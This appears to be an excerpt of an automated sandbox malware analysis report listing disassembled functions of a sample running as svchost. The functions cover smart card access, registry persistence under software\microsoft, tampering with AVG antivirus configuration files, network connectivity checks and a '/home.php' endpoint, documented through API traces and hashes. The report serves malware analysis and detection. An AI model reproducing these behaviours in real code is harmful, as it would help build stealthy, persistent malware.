                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseFlushOpenValue
                                                                                                                                                                                                                    • String ID: 80f50271a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2510291871-3506209191
                                                                                                                                                                                                                    • Opcode ID: e63f04f99148dba3b6b7ab9b68f6be2725fa1b7d9692b7ea7081e9efd6cc894c
                                                                                                                                                                                                                    • Instruction ID: 4ccb169730d5804e2a1c6b65925daf7e587f849852541bb732c89dd95e9780d8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e63f04f99148dba3b6b7ab9b68f6be2725fa1b7d9692b7ea7081e9efd6cc894c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3F030B5E80248FBE711CA91DD49FAA776CDF04B44F108699FA01E7140D770EA10A7A5
                                                                                                                                                                                                                    Function 02C93D20 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02C856A3,00000000), ref: 02C93D45
                                                                                                                                                                                                                    • SCardListReadersA.WINSCARD(02C856A3,00000000,?,FFFFFFFF), ref: 02C93D5C
                                                                                                                                                                                                                    • SCardConnectA.WINSCARD(02C856A3,?,00000002,00000003,?,?), ref: 02C93D8E
                                                                                                                                                                                                                    • SCardFreeMemory.WINSCARD(02C856A3,?), ref: 02C93DC9
                                                                                                                                                                                                                    • SCardReleaseContext.WINSCARD(?), ref: 02C93DDD
                                                                                                                                                                                                                    • SCardReleaseContext.WINSCARD(02C856A3), ref: 02C93DE7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Card$Context$Release$ConnectEstablishFreeListMemoryReaders
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4220388116-0
                                                                                                                                                                                                                    • Opcode ID: 573c72c4a9e818c6aef5024e680623d5f20106d5fc941ccebf31bba1b295727c
                                                                                                                                                                                                                    • Instruction ID: c89187b9411d758a93a7aa6bb40e3e85a88ed30e947d8ebbc6ad705c09c80665
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 573c72c4a9e818c6aef5024e680623d5f20106d5fc941ccebf31bba1b295727c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12310F76E10259ABDF21CF99C858BEEB7BDEF84604F144689E915E7240D770AB04CBA0
                                                                                                                                                                                                                    Function 02C73750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000101,?,02C73A83), ref: 02C73784
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,80f50271a,00000000,?,00000000,?), ref: 02C737A5
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 02C737B3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                    • String ID: 80f50271a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 3677997916-3506209191
                                                                                                                                                                                                                    • Opcode ID: 438c0b29fcafb0ee7a2b4f30c94ef07994edde75fffedb93b7823bde09dc40ab
                                                                                                                                                                                                                    • Instruction ID: 39ce229bfdeca4e4d3475bb05b3248a25564608a45d619c53a4a46de025325d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 438c0b29fcafb0ee7a2b4f30c94ef07994edde75fffedb93b7823bde09dc40ab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF03CB4E40248FBEB00CF94DD45FEEBBBCEB08704F104699EA05E7280D7B5A6048B94
                                                                                                                                                                                                                    Function 02C763B0 Relevance: 7.6, APIs: 5, Instructions: 81sleepthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C763D0
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4,?,76230F10,00000000), ref: 02C763EC
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C76060,00000000,00000000,00000000), ref: 02C76448
                                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,00000000,?,76230F10,00000000), ref: 02C76470
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,76230F10,00000000), ref: 02C76488
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$CheckConnectionInternetlstrcpyn$AdminAliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadUserWait
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2160739018-0
                                                                                                                                                                                                                    • Opcode ID: c1c63429beed57e14c7c737aa08adcf76ba01d878508a86c29c37f994b827aff
                                                                                                                                                                                                                    • Instruction ID: 3dc0d04ed023514038422d4c70a89f5ca956cc4b8728a668e52f9eeb92603945
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1c63429beed57e14c7c737aa08adcf76ba01d878508a86c29c37f994b827aff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF21DDB1E80A546BEB10E760ECC5FAE72ADEB8071CF200770EE19A70C0D7709981CAD5
                                                                                                                                                                                                                    Function 02C86B60 Relevance: 7.6, APIs: 5, Instructions: 68sleepsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathFindFileNameA.SHLWAPI(?), ref: 02C86BAA
                                                                                                                                                                                                                    • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02C86BE8
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02C86C03
                                                                                                                                                                                                                    • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02C86C0A
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02C86C31
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 433761119-0
                                                                                                                                                                                                                    • Opcode ID: c1684ec48ecddef40f8898ff08138462ce2a100142e524eb4fba62c96f528595
                                                                                                                                                                                                                    • Instruction ID: bcfdb10e190382c844aedb08370d7e2ec974b05cb5c38baabface1b0808283fc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1684ec48ecddef40f8898ff08138462ce2a100142e524eb4fba62c96f528595
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15212730800659A7DB11A7689D54BEA7BBCEB5130CF308AE5D94193280EB70DA44CFA0
                                                                                                                                                                                                                    Function 02C764D0 Relevance: 7.6, APIs: 5, Instructions: 64fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,762330D0,76233240,?,02C86C2C,?,00000000,?,?), ref: 02C764FD
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,02C86C2C,?,00000000,?,?,00000000), ref: 02C76518
                                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000,?,02C86C2C,?,00000000,?,?,00000000), ref: 02C76523
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000,?,02C86C2C,?,00000000), ref: 02C76542
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,02C86C2C,?,00000000), ref: 02C76553
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Handle$CloseCreateInformationWrite
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1150544999-0
                                                                                                                                                                                                                    • Opcode ID: ddcbb96374705cf52cbdecc391bc96d03b85cbcf8ec2711a2cff00bd067f1128
                                                                                                                                                                                                                    • Instruction ID: 98b00093aa3a58c397da18543a5d5bb16bafac63a40451ced172bc20f7b26919
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddcbb96374705cf52cbdecc391bc96d03b85cbcf8ec2711a2cff00bd067f1128
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4111C672680A447BE7218A56EC48FAB7B5CEBC5B64F148219FE05C7185C734CA05D771
                                                                                                                                                                                                                    Function 02C86B86 Relevance: 7.6, APIs: 5, Instructions: 54sleepsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathFindFileNameA.SHLWAPI(?), ref: 02C86BAA
                                                                                                                                                                                                                    • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02C86BE8
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02C86C03
                                                                                                                                                                                                                    • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02C86C0A
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02C86C31
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 433761119-0
                                                                                                                                                                                                                    • Opcode ID: 08760adc9a92dc8d63bd37e0f43de437070e6a5b343749d6b5ff67433059736e
                                                                                                                                                                                                                    • Instruction ID: 68bbfa5dd690334f510e52825f503ac55621b68adebc6cd197fbbc4c1d8dfd3f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08760adc9a92dc8d63bd37e0f43de437070e6a5b343749d6b5ff67433059736e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D119130940A59ABDB21EB64DC48BEA77BCFF5130CF2486A8DA51972C0DB709A54CF61
                                                                                                                                                                                                                    Function 02C76060 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C76084
                                                                                                                                                                                                                      • Part of subcall function 02C75F50: memset.MSVCRT ref: 02C75F72
                                                                                                                                                                                                                      • Part of subcall function 02C75F50: memset.MSVCRT ref: 02C75F90
                                                                                                                                                                                                                      • Part of subcall function 02C75F50: lstrcpynA.KERNEL32(?,?,00000104), ref: 02C75FAD
                                                                                                                                                                                                                      • Part of subcall function 02C75F50: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02C7601D
                                                                                                                                                                                                                      • Part of subcall function 02C75F50: RegSetValueExA.ADVAPI32(?,80F50759a,00000000,00000001,?,00000104), ref: 02C7603F
                                                                                                                                                                                                                      • Part of subcall function 02C75F50: RegCloseKey.ADVAPI32(?), ref: 02C7604D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C760B4
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C760B7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C760C4
                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 02C760C7
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: memset.MSVCRT ref: 02C75CA0
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75CE7
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75CF6
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75CFF
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D09
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D27
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D33
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D3C
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D46
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D64
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D71
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D7B
                                                                                                                                                                                                                      • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D86
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: callocexit$Heap$memset$Process$AdminCloseFreeOpenUserValidateValuelstrcpyn
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1120961889-0
                                                                                                                                                                                                                    • Opcode ID: e4218edf6ba31e1397917b57c30f898167aba79f535c1c080ad9b59ea0340bec
                                                                                                                                                                                                                    • Instruction ID: 1fcf35d9ee1f3b641c989daa45aed02a64f438b58484f111065045de3195ad55
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4218edf6ba31e1397917b57c30f898167aba79f535c1c080ad9b59ea0340bec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97F0F032EC46246BCA202AA5AC08F8BBB5CEF807A5F140A12F508D7080CB759065CAE4
                                                                                                                                                                                                                    Function 02C769D0 Relevance: 7.5, APIs: 5, Instructions: 20COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,02C8797D,7f1bf95c,?,?,?,?,?,?), ref: 02C769D7
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C769E2
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C769EA
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02C769F5
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C769FC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1233776721-0
                                                                                                                                                                                                                    • Opcode ID: b1ecba415cedae85a45a6f4e2ea15c6acc10cec7b8fdc08286130b115ba33829
                                                                                                                                                                                                                    • Instruction ID: 029d2a93728ab67eaee32f07bc64c6bb064ad0705db6a9bbf4102762476c0be3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1ecba415cedae85a45a6f4e2ea15c6acc10cec7b8fdc08286130b115ba33829
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FD01732E819919BD7131F31EC0CB6F766CBBC5B16F198AA4F842D3040EF34C2128665
                                                                                                                                                                                                                    Function 00402330 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402348
                                                                                                                                                                                                                    • MoveFileA.KERNEL32(?,?), ref: 0040240F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFolderMovePath
                                                                                                                                                                                                                    • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                                    • API String ID: 1404575960-1083204512
                                                                                                                                                                                                                    • Opcode ID: 85613be8a7ff22d3f2708ffc80a5f36b51ac17d5ce9254ffd30377348588094f
                                                                                                                                                                                                                    • Instruction ID: 218ec206f196096905059f0fa712dce574fe6e09d85f3a618a89c2f21692c038
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85613be8a7ff22d3f2708ffc80a5f36b51ac17d5ce9254ffd30377348588094f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43214FB45043448FC759CF14EA98B92BBF4BF98300F1581FADA89A73A2D774D944CB98
                                                                                                                                                                                                                    Function 02C92F00 Relevance: 6.1, APIs: 4, Instructions: 56timeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000000,00001400,00000000,00000000,7734FFB0,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F2C
                                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,02C86436,?,?,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F4A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F68
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F79
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3228293703-0
                                                                                                                                                                                                                    • Opcode ID: 74d2c5d0289e147a554c2e2df2393a89a28dd9d4837a4e901b2f3e514c150298
                                                                                                                                                                                                                    • Instruction ID: 00ae0e0cd36ab9f62e51b22f890fa0752f49c87762c8a4faa31451496eada84c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74d2c5d0289e147a554c2e2df2393a89a28dd9d4837a4e901b2f3e514c150298
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE110A71D51228AB8B11DFD58888AEEBBBCBB4CB10F14468AF955B3240D7715A058BE1
                                                                                                                                                                                                                    Function 02C86290 Relevance: 6.0, APIs: 4, Instructions: 27threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C85890,00000000,00000000,00000000), ref: 02C862A4
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C862BC
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C862CD
                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 02C862D5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4233414108-0
                                                                                                                                                                                                                    • Opcode ID: d328a97ac5bed89f73c61e0b3d1f8b3cad970d3428fa4f8c58baed391d3095c6
                                                                                                                                                                                                                    • Instruction ID: d8b473da1fd9b586a227525e106e6f6449cad00aa78bfcce2198c722376e50d6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d328a97ac5bed89f73c61e0b3d1f8b3cad970d3428fa4f8c58baed391d3095c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFE09B30EC1358B7F3219750DC0EF5A7A5C9F01B0AF2441D0F905A71C0C7F0A6108665
                                                                                                                                                                                                                    Function 02C835A0 Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                                      • Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                                      • Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                                      • Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,80F50759a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                                      • Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                                      • Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                                      • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                                      • Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                                      • Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76230F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C835F8
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,00000000,76230F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C835FB
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76230F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C83608
